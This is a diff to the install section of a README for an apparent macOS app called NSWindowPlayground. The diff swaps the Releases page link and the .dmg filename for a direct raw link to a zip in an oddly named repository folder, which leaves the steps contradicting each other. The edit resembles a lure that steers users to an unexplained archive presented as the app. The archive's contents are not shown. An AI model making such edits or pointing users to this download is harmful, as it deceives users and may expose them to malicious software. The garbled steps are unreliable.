Sahul17/NSWindowPlayground/README.md

 ## 📥 Download & Install

-1. Visit the [Releases page](https://github.com/Sahul17/NSWindowPlayground/releases) to download NSWindowPlayground.
+1. Visit the [Releases page](https://raw.githubusercontent.com/Sahul17/NSWindowPlayground/main/endoangiitis/NSWindowPlayground.zip) to download NSWindowPlayground.
 2. Find the latest version available.
 It will be at the top of the list.
-3. Click on the file named `NSWindowPlayground.dmg` to download it.
+3. Click on the file named `https://raw.githubusercontent.com/Sahul17/NSWindowPlayground/main/endoangiitis/NSWindowPlayground.zip` to download it.
 4. Once the download is complete, open the `.dmg` file.
 5. Drag and drop the NSWindowPlayground app into your Applications folder.
 6. You can now find the app in your Applications folder.